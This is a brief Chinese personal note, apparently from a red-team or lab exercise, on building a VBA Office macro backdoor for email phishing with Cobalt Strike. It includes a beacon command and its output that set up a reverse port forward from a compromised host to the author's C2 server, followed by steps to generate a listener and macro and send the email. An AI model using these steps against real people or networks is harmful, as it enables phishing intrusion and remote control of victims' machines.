邮件钓鱼

created: "2026-01-27 15:03"
tags:
  - 邮件钓鱼
aliases:
Type:
title:
updated: "2026-01-27 15:04"

1. VBA office宏后门制作

行动代号-电鳗 > 5.3. 邮件钓鱼
因为CS无法生成正向的vba(msf就可以，但是本地测试可以，靶机上无法成功)
只能通过反向，然后把30.10的端口转发到我们的CS服务器监听端口
这里做一个端口转发即可，在30.10的becon上执行下面命令 192.168.8.18是我CS服务器的地址

>>>> [01/23 21:19:18] beacon> rportfwd 12312 192.168.8.18 12312
[01/23 21:19:18] [+] started reverse port forward on 12312 to 192.168.8.18:12312
[01/23 21:19:18] [*] Tasked beacon to forward port 12312 to 192.168.8.18:12312
[01/23 21:19:18] [+] host called home, sent: 10 bytes

生成监听器
Pasted image 20260123212540.png
然后生成vba宏，
我用的是office 2016

然后发邮件